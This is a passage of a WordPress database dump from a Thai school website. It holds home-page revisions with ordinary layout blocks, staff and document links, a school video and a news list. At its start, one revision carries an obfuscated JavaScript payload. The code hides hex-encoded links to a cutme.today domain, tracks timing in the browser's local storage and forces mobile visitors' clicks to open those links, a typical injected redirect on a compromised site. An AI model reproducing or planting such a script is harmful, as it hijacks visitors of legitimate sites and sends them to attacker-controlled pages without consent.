_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 12:18:19','2024-08-27 05:18:19','',19,'http://watprato.ssk.in.th/?p=229',0,'revision','',0),
(231,2,'2024-08-28 08:57:10','2024-08-28 01:57:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" 